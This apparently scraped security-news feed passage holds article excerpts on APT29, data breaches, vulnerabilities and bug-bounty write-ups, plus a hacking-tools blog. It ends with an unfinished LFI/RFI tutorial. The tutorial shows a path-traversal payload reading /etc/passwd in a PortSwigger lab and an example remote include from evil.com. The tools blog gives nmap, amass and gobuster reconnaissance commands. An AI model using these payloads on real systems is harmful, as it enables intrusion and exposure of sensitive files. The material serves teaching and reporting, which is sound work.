exposure management platforms, leadership and even the board can have their eyes on these issues. That’s because we’re aligning security priorities with business priorities.Clearly communicate risk Of course, none of this works unless you communicate clearly. And communication can be a big challenge. You could use simple traffic light charts (i.e., red, yellow, green) to represent control coverage. But how do you accurately assign those colors? It can be a subjective exercise based more on your gut than real data. With exposure management software, your eventual goal should be to make that process quantitative and, ideally, real-time so you don’t have to pull a team off their work every quarter to do manual updates. Soon, we’ll live in a world where the moment something changes, we’ll see it communicated immediately. With that instantaneous information at our disposal, we’ll decide whether to act, defer or escalate.Manage change so it doesn’t manage youExposure management isn’t just a technical shift. It’s a change management exercise. You’re asking teams to work differently, respond to new priorities and trust a centralized system that makes decisions based on data that might be unfamiliar.That kind of shift takes time. It requires building relationships, clarifying expectations and iterating on the program until it works for everyone. As my colleague Arnie Cabral wrote in What it Takes to Start the Exposure Management Journey, we’ve started by rebuilding our policies, defining roles and responsibilities and ensuring that the people doing the work know exactly what’s expected — and why.Takeaways: This is the path forwardWe’re in the early days of this exposure management journey. And some of our industry certifications and policies still require us to fix everything above a certain CVSS score, whether or not it truly poses a threat. So there will be a level of reconciliation ahead between traditional compliance models and this more pragmatic, business-aligned approach.But I believe exposure management, when done right, can bridge that gap. It will give you the ability to say, “These are the risks that matter most — and here’s why.”That’s how you’ll make better decisions in the long run. You’ll better protect your business. And you’ll move security from reactive to strategic.Have a question about exposure management you’d like us to tackle?We’re all ears. Share your question and maybe we’ll feature it in a future post. MktoForms2.loadForm(""//info.tenable.com"", ""934-XQB-568"", 14070);

by Tenable

Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER. Check Point Research team reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium, BlueBravo, Midnight Blizzard, and The Dukes) is behind a sophisticated phishing campaign targeting European diplomatic entities, using a new WINELOADER variant and a previously unknown malware called GRAPELOADER. “While the […]

by Security Affairs

Attackers are increasingly sending phishing emails with SVG attachments that contain embedded HTML pages or JavaScript code.

by Securelist

Oracle has released version 8 of its Unbreakable Enterprise Kernel (UEK), a custom Linux kernel built for Oracle Linux. UEK 8 includes updates to memory management, better file system support, faster networking, and improvements for specific hardware platforms. It also pulls in changes from the wider Linux community. UEK 8 is designed to handle heavy workloads. It builds on the combination of Oracle Linux and UEK to support large enterprise systems. That includes setups using … More → The post Oracle releases Unbreakable Enterprise Kernel 8 (UEK 8) appeared first on Help Net Security.

by Help Net Security

Ahold Delhaize USA, the parent company of several well-known American supermarket brands, has confirmed that data was stolen during a cyberattack that took place in the fall of 2024. The company shared an update on Thursday, revealing that hackers managed to extract files from internal business systems connected to the earlier security breach. ""Based on our investigation to date, we believe certain files were taken from some of our internal U.S. business systems in connection with the prior cybersecurity issue,"" read the company''s statement. Ahold Delhaize USA operates over 2,000 grocery stores across the country, including major names like Stop & Shop, Food Lion, Giant Food, and Hannaford. In November 2024, the company reported disruptions that impacted online grocery ordering and caused temporary website outages for some of its supermarket chains. The company acted quickly at that time to restore its operations. “Our teams have been working diligently to determine what information may have been affected,” the company stated in its latest update. Ongoing Investigation of Ahold Delhaize USA Reveals Data Theft The Ahold Delhaize cyberattack has now been linked to the theft of certain files from internal U.S. business systems. While Ahold Delhaize USA did not detail exactly what kind of data was taken, it has assured that its teams are working hard to determine what information may have been affected. “We will notify affected individuals in accordance with our legal obligations,” the company said. Law enforcement agencies have also been informed and updated about the development. The company emphasized that protecting the information of its customers, employees, and vendors remains a top priority. INC Ransom Gang Takes Responsibility The INC Ransom gang has come forward, claiming responsibility for the cyberattack on Ahold Delhaize. In a post made earlier this week, the cybercriminal group claimed it stole six terabytes of data from Ahold Delhaize USA. As of this writing, The Cyber Express has reached out to Ahold Delhaize for further clarification regarding this claim, but the company has not responded. Who is INC Ransom? According to cybersecurity researchers at Cyble, INC Ransom (also known by the alias GOLD IONIC) is a highly active ransomware and extortion group. The group has been operating since at least July 2023 and has targeted a broad spectrum of industries worldwide, including healthcare, education, government, and now retail. INC Ransom is known for its advanced attack methods, often using multiple tools and malware families to infiltrate systems and steal data. These include: AdFind – A tool used to gather information from Active Directory environments PsExec – A command-line tool used to execute processes on remote systems Rclone – A command-line program used to manage files on cloud storage platforms The group’s reach is global, with confirmed attacks in countries such as the United States, the United Kingdom, Australia, France, Germany, Italy, the Philippines, and many more. A Series of Global Cyberattacks The Ahold Delhaize USA cyberattack is not the first major attack claimed by INC Ransom. In June 2024, the group was allegedly behind a cyberattack on ControlNET LLC, a U.S.-based provider of building technology solutions. ControlNET specializes in HVAC, lighting, video surveillance, access control, and power systems. In that case, the ransomware group not only claimed to have gained access to the company’s network but also released sensitive information to back their claims. The leaked data included: Invoice records Building floor plans Internal email communications Sample project folders involving ControlNET’s clients INC Ransom also claimed to have targeted Rockford Public Schools as part of the same attack vector, suggesting a potential supply chain risk. Why This Matters Cyberattacks like these are a growing concern for companies and consumers alike. For organizations such as Ahold Delhaize USA, which rely on technology to manage inventory, process payments, and offer online services, even a short disruption can cause significant operational and financial harm. When customer or employee data is involved, the risks extend far beyond temporary inconvenience. Leaked data can include sensitive personal information that could be used in phishing scams, identity theft, or even targeted attacks on individuals and other companies. The fact that INC Ransom claims to have stolen six terabytes of data is alarming. While Ahold Delhaize USA has not confirmed the volume or nature of the stolen information, such a large quantity could potentially include anything from employee records and vendor contracts to internal communications and system configurations. What Consumers Should Do If you shop at Stop & Shop, Hannaford, Food Lion, or Giant Food, keep an eye out for communications from the company. If your data was involved, you should receive an official notice with next steps. In the meantime, customers are advised to: Monitor their email and bank accounts for unusual activity Be cautious of phishing attempts pretending to be from Ahold Delhaize or its supermarket brands Change passwords for online accounts related to grocery shopping, especially if the same password is used elsewhere As ransomware groups like INC Ransom continue to adapt and strike globally, companies must prioritize cybersecurity at every level—from their internal systems to vendor relationships and beyond.

by The Cyber Express

A list of topics we covered in the week of April 12 to April 18 of 2025

by Malwarebytes Labs

A high-severity vulnerability has been discovered in a range of industrial recorder and data acquisition systems produced by Yokogawa Electric Corporation, a Japan-based automation and measurement equipment manufacturer. This flaw has been identified as CVE-2025-1863 and is categorized under CWE-306: Missing Authentication for Critical Function. The issue carries a CVSS v4 base score of 9.3 and a CVSS v3.1 score of 9.8, highlighting the extreme risk it poses to affected systems. Overview of Yokogawa Vulnerability The vulnerability is linked to insecure default settings in Yokogawa’s recorder products. Specifically, authentication is disabled by default on several of these devices. This means that when the devices are connected to a network without any configuration changes, anyone with network access can gain full access to critical functions—including system settings and operational controls. Such unrestricted access allows an attacker to manipulate measured values, alter system settings, and potentially compromise the integrity of critical operations in sectors like manufacturing, energy, and agriculture. Affected Yokogawa Products The vulnerability affects a wide range of Yokogawa’s paperless recorders and data acquisition units. The following models and versions are impacted: GX10 / GX20 / GP10 / GP20 Paperless Recorders: R5.04.01 and earlier GM Data Acquisition System: R5.05.01 and earlier DX1000 / DX2000 / DX1000N Paperless Recorders: R4.21 and earlier FX1000 Paperless Recorders: R1.31 and earlier μR10000 / μR20000 Chart Recorders: R1.51 and earlier MW100 Data Acquisition Units: All versions DX1000T / DX2000T Paperless Recorders: All versions CX1000 / CX2000 Paperless Recorders: All versions These devices are commonly used in critical infrastructure environments worldwide, including industrial manufacturing facilities, energy plants, and food processing units. Vulnerability Impact According to the technical evaluation, the Yokogawa vulnerability can be exploited remotely and with low attack complexity. No authentication or user interaction is needed, making it an attractive target for cyber attackers. The ability to manipulate sensitive data and operational settings without proper access control could result in: Incorrect measurements and faulty process outcomes Data integrity compromise Downtime in production lines Safety hazards in automated environments The threat becomes even more critical due to the default-disabled authentication, which implies that unless a user has manually enabled access controls, their systems are likely exposed. Technical Analysis The Yokogawa vulnerability stems from the absence of an enforced authentication mechanism in the default configuration of affected devices. In systems where authentication is not manually activated, any user on the network can access all critical device functions, including: Configuration of sensors and thresholds Adjustment of logging parameters Export and modification of stored data The CVSS v4 vector string for this vulnerability is: CVSS4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N This reflects: Attack Vector: Network Attack Complexity: Low Privileges Required: None User Interaction: None Confidentiality, Integrity, and Availability Impact: High The vulnerability was discovered and disclosed by Souvik Kandar from MicroSec (microsec.io) and was coordinated with the Cybersecurity and Infrastructure Security Agency (CISA). Yokogawa’s Mitigation Measures Yokogawa has issued guidance for all users of the affected products. Key recommendations include: Enable Authentication: Immediately activate the login function (authentication feature) on all affected devices if they are connected to a network. Change Default Passwords: After enabling authentication, update the default credentials to strong, unique passwords to prevent unauthorized access. Implement a Comprehensive Security Program: Yokogawa strongly recommends a complete security strategy that includes: Patch management and regular firmware updates Anti-virus deployment Data backup and recovery plans Network zoning and segmentation System hardening Application and device whitelisting Proper firewall configuration The company also offers security risk assessments to help customers evaluate and improve their current security posture. Impacted Industries and Global Reach Given the widespread use of Yokogawa recorders in automation and critical systems, this Yokogawa vulnerability has implications across several sectors: Critical Manufacturing: Automated production environments rely heavily on precise data logging and process control. Manipulation of recorder settings could lead to costly downtime or product defects. Energy: In power plants and substations, these devices often monitor critical parameters. A security breach could result in operational disruption or even physical damage. Food and Agriculture: Accurate recording of environmental data is essential for food safety and quality. An attacker could alter data to mask spoilage or unsafe conditions. The default disabled authentication presents a critical security gap that can be easily closed with proper configuration. However, the responsibility lies with users and system integrators to follow through with security best practices. Conclusion Industrial operators must not assume out-of-the-box configurations are secure, especially when deploying devices in critical environments. As threat actors increasingly target operational technology (OT) systems, proactive device hardening and security governance become non-negotiable. Addressing this vulnerability promptly will not only secure your systems but also ensure continuity, safety, and reliability in critical operations.

by The Cyber Express

Hawk Eye is an open-source tool that helps find sensitive data before it leaks. It runs from the command line and checks many types of storage for PII and secrets: passwords, API keys, and personal information. “Unlike most open-source tools that only scan cloud buckets for PII, this solution is designed for deep integration across your entire ecosystem. It supports 350+ file types (including videos, images, and documents), uses advanced OCR, and ensures complete data … More → The post Hawk Eye: Open-source scanner uncovers secrets and PII across platforms appeared first on Help Net Security.

by Help Net Security

Attackers are focusing more on stealing identities. Because of this, companies need to use zero trust principles. They should also verify user identities more carefully, says DirectDefense. Researchers analyzed thousands of alerts, mapping them to the MITRE ATT&CK framework, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. Top five attack tactics Initial access: Initial access remains the most frequently-observed adversarial tactic, representing more than 27% of escalated alerts. In 2024, … More → The post Cybercriminals blend AI and social engineering to bypass detection appeared first on Help Net Security.

by Help Net Security

Discover how Next-Generation Firewalls are adapting to combat AI-enabled cyberattacks and evolving to protect organizations in today''s dynamic threat landscape.

by Cybersecurity Dive

Businesses are losing out on an average of $98.5 million a year as a consequence of cyber threats, fraud, regulatory hurdles and operational inefficiencies, according to research from FIS and Oxford Economics. The cost of disharmony is highest among technology companies, followed by insurance, financial services and fintech respondents. The study revealed nine sources of disharmony, defined as disruptions and inefficiencies across the money lifecycle, with the most significant ones including: 88% of respondents identified … More → The post Cyber threats now a daily reality for one in three businesses appeared first on Help Net Security.

by Help Net Security

A free, TryHackMe-inspired roadmap with resources and labs to kickstart your penetration testing journey.Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

5 Tools I Wish I Knew When I Started HackingAs I entered the world of hacking and cybersecurity, I was bombarded with the quantity of tools available. Each YouTube video, course, or website had a list of “must-have” tools that differed from one another, and I had no idea where to begin. After a while, I tried, messed up, learned, and ultimately discovered which tools actually helped.5 Hacking ToolsHere in this blog, I would like to introduce five hacking tools that I wish I had known about when I was beginning to hack. They are easy to use for beginners, immensely powerful, and immensely popular across the industry. If you are new, or even if you are experienced, these can become your new go-to’s.Prefer watching instead of reading? Here’s a quick video guidehttps://medium.com/media/fc15ba1572bf57d2f7bb8723e927d217/hrefBurp SuiteCategory: Web Application TestingWhy It’s Useful: Intercept and tamper web traffic.When I first started web hacking, I was doing a lot of manual testing — viewing HTML source code, using browser developer tools, or executing simple scripts. I had heard of Burp Suite but steered clear of it because it seemed daunting.Big mistake.Burp Suite is a Swiss Army knife for web application penetration testing. It lets you:Intercept HTTP/HTTPS traffic between your browser and the target site.Alter requests and responses in real time.Test inputs repeatedly with Intruder.Spider sites to crawl all accessible pages.Scan for typical web vulnerabilities (Pro version).I now use Burp Suite for nearly all web app testing. Even the free version is extremely capable and more than sufficient for beginners.Pro tip: Have Burp Suite Community Edition work together with FoxyProxy in Firefox to redirect traffic simply through Burp.NmapCategory: Network ScanningWhy It’s Useful: Find open ports, services, and vulnerabilities.Initially, I downplayed Nmap. I assumed that it was “just a port scanner.” But the more I delved, the more I appreciated how useful and versatile it is.Nmap is capable of:Discovering live hosts on a network.Scanning open ports and the service they are running.Guessing operating systems and hardware information.Executing scripts with the use of NSE (Nmap Scripting Engine) to identify vulnerabilities.For instance, this command provides you with a lot of information:nmap -sC -sV -A target.comIt performs a default script scan (-sC), version detection (-sV), and aggressive scan (-A) all at once.Pro tip: When performing CTFs or actual testing, always begin with Nmap to get a lay of the land.AmassCategory: Reconnaissance / Subdomain EnumerationWhy It’s Useful: Discover hidden subdomains and increase attack surface.Recon is perhaps the most important aspect of ethical hacking. The better you know your target, the higher your chances of discovering vulnerabilities.When I began, I relied on basic tools such as sublist3r or online subdomain finders. But Amass revolutionized everything.Amass is an incredibly useful tool for:Finding subdomains from multiple data sources.Mapping domain relationships.Performing active and passive recon.A simple command such as:amass enum -d example.comcan expose dozens of subdomains you might not have discovered otherwise.Pro tip: Cross-reference Amass findings with tools such as httpx to see which subdomains are alive and accessible.CyberChefCategory: Data Encoding/DecodingWhy It’s Useful: Rapidly transform, encode, decode, or inspect data.I used to spend hours trying to manually decode base64 or coding Python scripts just to xor-decrypt a string. Then I stumbled upon CyberChef, and it was like magic.CyberChef is a browser-based tool by GCHQ (UK’s intelligence agency). It enables you to perform a variety of data operations including:Base64 encode/decodeHex to ASCIIXOR encryption/decryptionHashing (MD5, SHA256, etc.)JWT analysisRegex extractionIt’s drag-and-drop simple where you pile up different “operations” in a pipeline. Super intuitive, super quick.Pro tip: Bookmark CyberChef (https://gchq.github.io/CyberChef/) — it’ll save you hundreds of hours.GobusterCategory: Directory/Content EnumerationWhy It’s Handy: Find hidden directories and files on web servers.Ever gone to a website and wondered, “There’s more to this”? That’s where Gobuster comes in. It brute-forces files and directories on a web server with a wordlist.gobuster dir -u http://example.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtIt attempts hundreds or thousands of typical folder and file names to find hidden pages such as:/admin/login/backup.zipWhy should this matter? Often, these pages aren’t referenced from anywhere on the website. Discovering them can expose tasty vulnerabilities.Tip: Use Gobuster with a decent wordlist such as SecLists, and scan various status codes (e.g., 200, 403, 301).Final ThoughtsHacking is half creativity and attitude, and half tools. But the proper tools can make you a superhero — allowing you to automate drudgery, discover previously unknown weaknesses, and get things done more quickly.These five tools — Burp Suite, Nmap, Amass, CyberChef, and Gobuster — are ones I’ve always regretted not mastering sooner. If you’re just beginning, I wholeheartedly urge you to dive into each of them individually. Not only learn how to use them, but also why they function the way they do.And don’t forget: tools change, but knowledge remains.Bonus TipsDon’t attempt to learn everything at once. Learn one, practice it in a lab or CTF, and proceed to the next.Keep yourself updated. Most tools receive new features or bug fixes on a regular basis.Monitor GitHub repos of these tools for updates and read their documentation.Originally published at OpenExploit.in5 Tools I Wish I Knew When I Started Hacking was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Analysing the Matrix server chat log data dump from the notorious Black Basta ransomware.On the 20th of February 2025, the Matrix server chat logs from the notorious ransomware group Black Basta were uploaded to MEGA. This caused a wave of activity from cyber security firms and individuals looking for needles in the 200k message haystack.The leak provides a fascinating peek behind the curtain of a major ransomware operation and an opportunity to identify data trends.Working HoursFrom September 2023 until June 2024​​, the Black Basta chat server was most active each week from approximately 07:00 until 21:00.The number of messages sent on Friday afternoons differed from those on other afternoons in the week, and weekends were much quieter.A heat map of message activity on the Black Basta matrix serverRansom NegotiationsDuring active ransomware negotiations (Volex, True and Ascension Health) Black Basta members communicated with each other using more expletives than usual.Graph showing the number of expletives used throughout the year in relation to key negotiation eventsand when these negotiations were taking place, specific user message volume patterns outline lead members.Charts showing the number of messages sent by Black Basta members during periods of negotiationSome members appeared to be involved in all negotiation discussions:GGlapayywhilst other members only appeared to be related to certain events:W (Volex)n3auxaxl (True)nickolas (Ascension Health)Communication ChangesThroughout the year, the collective emotions of the group would change depending on the situation they were in.Graph showing the number of phrases relating to emotions throughout the year in relation to key negotiation eventsExcitement was typically expressed in and around major ransomware negotiations, sprinkled with small spikes of frustration.On average, the longest messages were sent early in the morning at 02:00 whilst the shortest messages were typically sent in the evening 19:00.Chart showing the average message length over the average dayRelationshipsThe number of times Black Basta members make reference to other group members gives an idea of the potential links within the group.Graph showing the number of times each Black Basta member mentioned each otherThe high number of connections highlighted the amount of communication that took place within the group.Connections of note include:GG → lapaGG → WSS → cameron777W → SSDburito → n3auxaxlConclusionThe Black Basta leak lays bare a year of ransomware operations, revealing distinct patterns in activity, communication, and group dynamics.Structured working hours and heightened exchanges during negotiations paints a picture of an organized effort shaped by key contributors and shifting priorities.Black Basta Leak Analysis was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

The strange trick that exposed a hidden security flaw (and how you can find bugs like this too).Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

We will solve this lab based on the API documentation exposed to delete Carlos's user.Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Free Link🎈Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

In supply chain operations, GenAI is gaining traction. But according to Logility’s Supply Chain Horizons 2025 report, many security leaders remain uneasy about what that means for data protection, legacy tech, and trust in automation. The survey of 500 global supply chain leaders shows that 97% are already using some form of GenAI. But only a third are using tools designed specifically for supply chain tasks. And nearly half (43%) say they worry about how … More → The post Why CISOs are watching the GenAI supply chain shift closely appeared first on Help Net Security.

by Help Net Security

This week on the Lock and Code podcast, we speak with Sydney Saubestre about DOGE and its access to Americans'' data.

by Malwarebytes Labs

One of the founders of startup accelerator Y Combinator offered unsparing criticism this weekend of the controversial data analytics company Palantir, leading a company executive to offer an extensive defense of Palantir’s work. The back-and-forth came after federal filings showed that U.S. Immigration and Customs Enforcement (ICE) — tasked with carrying out the Trump administration’s […]

by TechCrunch

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malicious NPM Packages Targeting PayPal Users New Malware Variant Identified: ResolverRAT Enters the Maze       Nice chatting with you: what connects cheap Android smartphones, WhatsApp and cryptocurrency theft?   BPFDoor’s Hidden Controller Used Against Asia, Middle East […]

by Security Affairs

In a rather clever attack, hackers leveraged a weakness that allowed them to send a fake email that seemed delivered from Google''s systems, passing all verifications but pointing to a fraudulent page that collected logins. [...]

by BleepingComputer

Smarter TV operating systems come with new privacy risks - chief among them is automatic content recognition (ACR), a feature that tracks what you watch.

by ZDNET Security

The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that''s targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER. ""While the improved WINELOADER variant is still a modular backdoor used in later stages, GRAPELOADER is a newly observed initial-stage tool

by The Hacker News

ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. [...]

by BleepingComputer

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Attackers exploited SonicWall SMA appliances since January 2025 ASUS routers with AiCloud vulnerable to auth bypass exploit U.S. […]

by Security Affairs

Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple plugs zero-day holes used in targeted iPhone attacks (CVE-2025-31200, CVE-2025-31201) Apple has released emergency security updates for iOS/iPadOS, macOS, tvOS and visionOS that fix two zero-day vulnerabilities (CVE-2025-31200, CVE-2025-31201) that have been exploited “in an extremely sophisticated attack against specific targeted individuals on iOS.” When companies merge, so do their cyber threats For CISOs, mergers and acquisitions (M&A) bring … More → The post Week in review: LLM package hallucinations harm supply chains, Nagios Log Server flaws fixed appeared first on Help Net Security.

by Help Net Security

🚀Free Article Link…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

EnumerationContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Ciao hackers, I hope you’re hacking well. In this write-up, I’m going to share a business logic flaws on a crypto wallet website that can lead to the takeover of any victim’s wallet account. I will be using redacted.com as the main domain.The company is a crypto wallet to earn, buy, store, and stake tokens.The front end of the application is at app.redacted.tv and all the backend APIs are at api.redacted.tv. As usual, I fired up my burp suite and started exploring the application.I created an account on the website, to verify email an email verification code is being sent to given email address. I verified the account and on the next page, 2FA is compulsory to set up. After finishing up the registration my account is ready to use. Below is the flow of registration:1. Enter Name, Email address and Password2. Enter verification code on verify email page3. Setup 2FA4. Logged in to the account.In the step of verification of email, I notice that the URL is https://app.redacted.tv/verify?email=user@gmail.com. I thought, let’s open this URL in an incognito tab or another browser. After forced browsing the URL the verification page opened without entering password and asked for the verification code.I quickly checked whether the same verification code could be used again or not, and I was surprised by the next page. It confirms that if I have the verification code of the victim then I can set up 2FA on the victim’s account as well as can log in to the account without a password.After repeating the below flow:1. Open https://app.redacted.tv/verify?email=user@gmail.com2. Enter received verification code3. Setup 2FA4. Logged in to the account.It worked as I thought and confirms that:An already-used verification code can be used multiple times for same email.You don’t need a password to set 2FA and to get logged in to any other user account. You just need the verification code and email of the victim’s account.You can set up 2FA even if it was already configured during the registration process. The old 2FA will be overridden by the new one.The only piece missing in the attacking puzzle is the verification code. The verification code is random and it’s not possible to brute force. Moreover, the verification code is tied to an unique email address.I tried a few ways to get a verification code:Is there any client-side function or piece of code to generate it by providing an email address? — NoWhether the verification code is leaked in response or through other API’s ? — NoLooking for verification code on the internet archive, waybackurls, e.t.c — Found NoneWithout any expectation and with good intentions I submitted the report to the security team with proper impact given that the attacker is already having the verification code.After a few days, I got a positive response from the program manager and received a reward of 20000 tokens worth $1250.Sometimes, you just have to submit the report without expecting any reward. You’ve already invested the time to find the issue, so it’s better to report it — otherwise, that effort goes to waste. Don’t let the assumption that the attack complexity is high or that the program might not accept it to stop you from reporting.Thanks for reading, hope you learned something new. Do clap and share if you like. Sayonara and Happy Hacking!Twitter: 7he_unlucky_guyLinkedin: VijetaBusiness Logic Flaw worth $1250 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

In today’s fast-paced dev world, writing clean, maintainable, and testable code isn’t just a good practice — it’s survival. Enter…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Kaspersky researchers report the reappearance of MysterySnail RAT, a malware linked to Chinese IronHusky APT, targeting Mongolia and…

by Hackread

Cybersecurity researchers have uncovered three malicious packages in the npm registry that masquerade as a popular Telegram bot library but harbor SSH backdoors and data exfiltration capabilities. The packages in question are listed below - node-telegram-utils (132 downloads) node-telegram-bots-api (82 downloads) node-telegram-util (73 downloads) According to supply chain

by The Hacker News

Midnight Blizzard (APT29/Cozy Bear) targets European embassies and Ministries of Foreign Affairs with sophisticated phishing emails disguised as…

by Hackread

Windows administrators from numerous organizations report widespread account lockouts triggered by false positives in the rollout of a new Microsoft Entra ID''s ""leaked credentials"" detection app called MACE. [...]

by BleepingComputer

Threat actors are actively exploiting a remote code execution flaw in SonicWall Secure Mobile Access (SMA) appliances since January 2025. Arctic Wolf researchers warn that threat actors actively exploit a vulnerability, tracked as CVE-2021-20035 (CVSS score of 7.1), in SonicWall Secure Mobile Access (SMA) since at least January 2025. The vulnerability is an OS Command […]

by Security Affairs

ASUS has disclosed a critical security flaw impacting routers with AiCloud enabled that could permit remote attackers to perform unauthorized execution of functions on susceptible devices. The vulnerability, tracked as CVE-2025-2492, has a CVSS score of 9.2 out of a maximum of 10.0. ""An improper authentication control vulnerability exists in certain ASUS router firmware series,""

by The Hacker News

A new malware-as-a-service (MaaS) platform named ''SuperCard X'' has emerged, targeting Android devices via NFC relay attacks that enable point-of-sale and ATM transactions using compromised payment card data. [...]

by BleepingComputer

Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to remotely execute code on impacted devices. [...]

by BleepingComputer

Plus: A US judge rules against police cell phone “tower dumps,” China names alleged NSA agents it says were involved in cyberattacks, and Customs and Border Protection reveals its social media spying tools.

by WIRED Security News

Google Gemini is testing a ChatGPT-like scheduled tasks feature called ""Scheduled Actions,"" which will allow you to create tasks that Gemini will execute later. [...]

by BleepingComputer

FoxCMS 1.2.5 - Remote Code Execution (RCE)

by Exploit DB

Drupal 11.x-dev - Full Path Disclosure

by Exploit DB

Cybersecurity researchers are warning of a ""widespread and ongoing"" SMS phishing campaign that''s been targeting toll road users in the United States for financial theft since mid-October 2024. ""The toll road smishing attacks are being carried out by multiple financially motivated threat actors using the smishing kit developed by ''Wang Duo Yu,''"" Cisco Talos researchers Azim Khodjibaev, Chetan

by The Hacker News

The energy sector stands as a critical pillar of our society. From the electricity powering our homes to the fuel driving our industries, reliable energy is essential. However, the very interconnectedness that makes the energy sector so vital also exposes it to significant vulnerabilities, particularly within its supply chain.

by KnowBe4

Resecurity warns that a China-based cybercriminal gang dubbed the “Smishing Triad” is launching a wave of road toll-themed SMS phishing (smishing) attacks against users across the US and the UK.

by KnowBe4

Threat actors would be at least temporarily derailed, experts say. But the real issue ladders back to organizations’ weak cyber hygiene.

by Dark Reading

On April 16th, 2025, Erlang/OTP team disclosed a critical vulnerability affecting their SSH server implementation [1]. CVE-2025-32433 is an unauthenticated remote code execution vulnerability with a CVSS score of 10.0 (Critical) that allows adversaries to run arbitrary code on vulnerable systems with elevated privileges. Erlang/OTP is commonly used in critical infrastructure; therefore, organizations are strongly urged to patch vulnerable SSH servers without delay.

by Picus Security

It is hard to believe that we are now over three months into 2025. This is a good time to pause and survey stakeholders and cybersecurity experts about the emerging trends observed so far this year.

by Barracuda

ASUS warns of an authentication bypass vulnerability in routers with AiCloud enabled that could allow unauthorized execution of functions on the device. ASUS warns of an authentication bypass vulnerability, tracked as CVE-2025-2492 (CVSS v4 score: 9.2), which impacts routers with AiCloud enabled. A remote attacker can trigger the flaw to perform unauthorized execution of functions on the […]

by Security Affairs

by Dark Reading

by Dark Reading

Illucist Thanks G, happy to get words for appreciation from you 🙂 .

by HACKLIDO

Check out the top OSINT tools of 2025, an updated list featuring the best free and paid open-source…

by Hackread

Identity verification, insurance claims, and financial services are all seeing surges in AI-enabled fraud, but organizations are taking advantage of AI systems to fight fire with fire.

by Dark Reading

Introduction to File Inclusion Vulnerabilities File inclusion vulnerabilities create a security risk that freely allows unrestricted access to all files including dangerous assets from external sources. Two corresponding flavors of this web application security attack are : Local File Inclusion (LFI) and Remote File Inclusion (RFI). The weaknesses exploit the same issue through user input vulnerabilities in file-loading operations but they function differently in attacks. Each one of the numerous weaknesses that permeate the cybersecurity domain has multiple names associations. The exploitation methods for these security flaws commonly relate to path traversal even though the security community also uses this term interchangeably with LFI attack techniques. Local File Inclusion (LFI): In LFI, attackers move file-path parameters to suck sensitive files directly into the server’s filesystem into the application’s context. Imagine a librarian mindlessly following the uncovered note ''go up four shelves get the locked ledger.'' Through the use of path traversal, i.e., through the inclusion of sequences like ../../../../etc/passwd attackers can navigate directory structures in order to access files like /etc/passwd, configuration files or even the source code of your application. Path traversal is the way in which that key, the weak input validation, is used to get access past those “in intended” areas, to get past the boundaries for file access. The damage? Leaked secrets are only the beginning. With exploits like log poisoning—where the bad guys feed Slash, malicious code into server logs and then include them—or abuse of PHP wrapper like php://filter, I an LFI can fairly easily get lifted to full on Code Execution. A classic example? The 2007 Joomla LFI exploit where attackers combined path traversal with weak validation to leak database logs - two years before Brian Krebs. Remote File Inclusion (RFI): RFI takes it a step further. Rather than going around town squinting through local shelves, it is more like the librarian retrieving a book from offsite – the sounds and smells that don’t really belong - say, a dodgy website hosting a nasty PHP malware in the back room. By using fully qualified URL (e.g. http://evil.com/malware.php) attackers trick the application to download and execute remote scripts on protocols like HTTP or FTP. The result is typically instant: remote code execution and the server is handed over to the attackers on a silver platter. Due to RFI fame, it exploded into peak in early 2000s with exploits on part of the poorly configured PHP web sites, where allow_url_fopen and allow_url_include were also left unchecked (the whole door was wide opened). Now we know how this vulnerability works, you might be excited to exploit this in wild. Let’s say there exists an website that has an parameter called https://example.com?filename=cat.png, then you can change file name to get some files remotely from the server. Do note that servers especially in linux are hosted in /var/www/html, which is three directory depth from root directory. If we want to get any sensitive file like flag.txt, or /etc/passwd which acts like common proof of concept for this vulnerability, we are expected to get it relative from /root directory which is three directories from our server configuration. In that case we can traverse through directories using simple back track command like ../ since we need to move three level upwards, ../../../file would work. Feel free to solve this portswigger lab and try out for yourself. Simply put, enumerate and find the parameter, and use a simple payload like following to get /etc/passwd https://0a2000cc04b90fd6802b9ee300ba00e5.web-security-academy.net/image?filename=../../../etc/passwd But when accessed through website it renders an empty image something like below. Maybe let’s look through burpsuite, and we do find, /etc/passwd contents in the response. Although we solved lab, only because we were able to find out the right parameter to fuzz or to inject our payloads. In real websites how to we find parameters to inject something? That’s indeed a valid intriguing question right? How to find parameters to test for file inclusion vulnerability? Simply put, this blog will cover four options. Note this these are not pick one option that you find attractive and leave. In real world, we might need to test and try all possible option, and at worst cases one or none might work. But from CTFs and vulnerable machines, we tested and found that the four methods have withstood hard times, and worked in most of the scenarios. Option 1 : Manual hunting As cliché as it sounds, clicking every button, submitting every forms, exploring every options, making keen notes on network connection made by the endpoint, and inspecting each functionality with burpsuite and when we find any abnormal or interesting requests or endpoint, (this happens after we gained intuition that comes with experience), we might find some endpoints. That does not sound fair right? does it mean we have to wait for 3-7 years till we get mastery? No, recon frameworks and asset discovery and attack surface 